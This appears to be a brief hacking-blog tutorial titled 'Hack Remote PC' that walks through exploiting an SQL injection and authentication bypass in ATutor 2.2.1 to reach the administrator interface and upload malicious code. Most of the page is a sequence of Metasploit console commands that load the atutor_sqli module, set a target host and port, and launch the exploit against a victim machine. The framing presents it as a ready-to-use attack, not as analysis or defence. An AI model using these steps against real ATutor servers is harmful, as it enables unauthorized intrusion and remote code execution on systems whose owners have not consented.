Hack Remote PC using ATutor 2.2.1 SQL Injection / Remote Code Execution

Datetime:2016-08-23 00:16:18          Topic: SQL Injection           Share

This module exploits SQL Injection vulnerability and authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authentication and reach the administrator’s interface where they can upload malicious code.

  Exploit Targets

ATutor 2.2.1

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type  msfconsole

Now type  use exploit/ multi/http/atutor_sqli

msf exploit( atutor_sqli )> set targeturi /Atutor/

msf exploit( atutor_sqli )> set rhost 192.168.0.110 (IP of Remote Host)

msf exploit( atutor_sqli )> set rport 80

msf exploit ( atutor_sqli )> exploit         





About List